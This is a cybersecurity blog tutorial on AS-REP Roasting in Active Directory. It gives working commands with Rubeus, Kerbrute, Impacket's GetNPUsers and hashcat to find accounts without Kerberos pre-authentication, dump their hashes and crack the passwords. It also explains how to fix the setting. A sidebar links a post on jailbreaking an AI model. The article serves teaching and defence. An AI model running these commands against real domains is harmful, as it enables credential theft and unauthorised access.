Write
OneWriteup
  • Login
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
OneWriteup
No Result
View All Result

What is As-Rep Roasting attack in Active Directory and How does it work?

Discover how attackers exploit Kerberos vulnerabilities through As-Rep Roasting, learn step-by-step techniques for identifying and preventing this attack, and strengthen your network security.

FOUNDER by FOUNDER
August 19, 2025
Reading Time: 3 mins read
24
0
What is As-Rep Roasting attack in Active Directory and How does it work?
Share on FacebookShare on Twitter

What is As-Rep Roasting Attack?

As-Rep Roasting is an attack technique that targets Kerberos in environments where Pre-Authentication is disabled.

When Pre-Authentication is disabled, an attacker can request an Authentication Service (AS) Response Message (AS-Rep) for a user without needing to prove knowledge of their password. The Key Distribution Center (KDC) responds with an encrypted message (the AS-REP), which includes a part that is encrypted using the user’s password. The attacker can use tools like hashcat or johntheripper and attempt to crack it offline, revealing the user’s password.

 

How to identify vulnerable As-Rep Roast accounts in Active Directory?

In a Windows Active Directory (AD) environment, an attacker can use tools like PowerShell to search for accounts where Pre-Authentication is not enforced. These accounts can be identified by using the UF_DONT_REQUIRE_PREAUTH flag.

Get-ADUser -Filter {UserAccountControl -band 4194304} -Properties UserAccountControl

How to create vulnerable AS-Rep Roasting Account?

System administrators may create vulnerable accounts by disabling Pre-Authentication for specific users.

Step 1: Open Server Manager and navigate to Active Directory Users and Computers.
Step 2: Select the user account properties.
Step 3: Under the Account tab, check the option for Do not require Kerberos preauthentication.
Step 4: Apply the changes.

What are the tools used for performing As-Rep Roasting attack?

1. Ruberos

Rubeus is a command-line tool written in C# to abuse Kerberos authentication in Windows Active Directory environments

Rubeus.exe asreproast /domain:YourDomainName.local

This command will request AS-REPs for vulnerable accounts and output their encrypted credential hashes, which can be used for offline cracking.

2. Kerbrute 

Kerbrute is another tool designed for brute-forcing and enumerating user accounts in Kerberos environments. It can also be used to exploit As-Rep Roasting vulnerabilities.

Kerbrute has four main commands:

  1. bruteuser – Bruteforce a single user’s password from a wordlist
  2. bruteforce – Read username:password combos from a file or stdin and test them
  3. passwordspray – Test a single password against a list of users
  4. userenum – Enumerate valid domain usernames via Kerberos

./kerbrute_linux_amd64 userenum -d 'server.local' --dc 10.0.0.203 ~/wordlists/user.txt

3. Impacket

Impacket is a Python library containing scripts for testing a wide variety of network protocols weakness. The GetNPUsers.py script can be used to exploit As-Rep Roasting.

Impacket is by default located on /usr/share/doc/python3-impacket/examples/ in Kali Linux.

Identify the vulnerable As-Rep roast accounts using Impacket.

python3 GetNPUsers.py -userfile username.txt -dc-ip 10.0.0.203 server.local/

Drop password hash for vulnerable As-Rep roast accounts.

python3 GetNPUsers.py -userfile username.txt -request -dc-ip 10.0.0.203 "server.local/"

 

How to crack the hash?

Once the attacker obtains the AS-REP encrypted data, it can be brute-forced offline using tools like Hashcat.

hashcat -m 18200 hash.txt wordlist.txt -o Cracked.txt

The -m 18200 parameter specifies the mode for Kerberos 5 AS-REP hashes. If successful, this process will reveal the plaintext password for the user.

How to stop As-Rep Roast attack?

Step 1: Identify the vulnerable accounts

Get-ADUser -Filter {UserAccountControl -band 4194304} -Properties UserAccountControl

Step 2: Open Server Manager and navigate to Active Directory Users and Computers.
Step 3: Select the user account properties.
Step 4: Under the Account tab, uncheck the option for Do not require Kerberos preauthentication.
Step 5: Apply the changes.

 

Read about: How to exploit Access Control List?

What is Access Control List (ACL) and How to exploit it in Active Directory?

Disclaimer: This blog is for educational purposes only, promoting awareness of ethical hacking and cybersecurity to help readers protect against cyber threats. All content is based on lawful experiments on our own systems. No illegal activities are endorsed. Users agree to apply the information responsibly and legally. The blog and author are not liable for any misuse. By using this blog, you agree to use all knowledge ethically and legally. [Read full disclaimer].

 

Buy me a coffee
FOUNDER

FOUNDER

Cybersecurity aficionado committed to disseminating expertise, crafting articles that empower others to resolve errors and fortify online defenses with ease.

Recently Posted

Beginner’s Guide to Reverse Engineering Malware with dnSpy

Beginner’s Guide to Reverse Engineering Malware with dnSpy.

August 19, 2025
176
DNS Based Data Exfiltration Using Burp Collaborator Client

DNS Based Data Exfiltration Using Burp Collaborator Client

August 19, 2025
144
Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

August 19, 2025
1.1k
HOW To BECOME AN ETHICAL HACKER ROADMAP

Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

August 19, 2025
885
Load More

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recommended

OSCP vs OSCP+: What New Changes Have Been Made?

OSCP vs OSCP+: What New Changes Have Been Made?

August 19, 2025
660
How to remove Private Leaked Photo or Video from internet.

7 Steps To Remove Leaked Private Photos or Videos from the Internet.

August 19, 2025
369

Popular Story

  • Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

    Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

    203 shares
    Share 81 Tweet 51
  • 100 Most Asked SOC Analyst Interview Questions For Freshers

    125 shares
    Share 50 Tweet 31
  • OSCP vs OSCP+: What New Changes Have Been Made?

    119 shares
    Share 48 Tweet 30
  • How to use Bloodhound / Sharphound for Pentesting Active Directory?

    130 shares
    Share 52 Tweet 33
  • Zero-Day Market: Understanding the Hidden World of CyberSecurity

    37 shares
    Share 15 Tweet 9

Support This Write-Up. Fund the Next

Buy me a coffee
OneWriteup

Discover expert cybersecurity articles, tutorials, and the latest trends to protect your digital world.

  • Disclaimer
  • About Us
  • Feedback
  • Contact Us
  • Report
  • Privacy Policy
  • Community Guidelines
  • Terms Of Service

© 2024 OneWriteup

No Result
View All Result
  • Trending
  • Articles
  • News
  • Blog
  • Tutorials
  • Research
  • Top 10 Lists
  • Case Studies
  • Interviews
  • Login

© 2024 OneWriteup

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In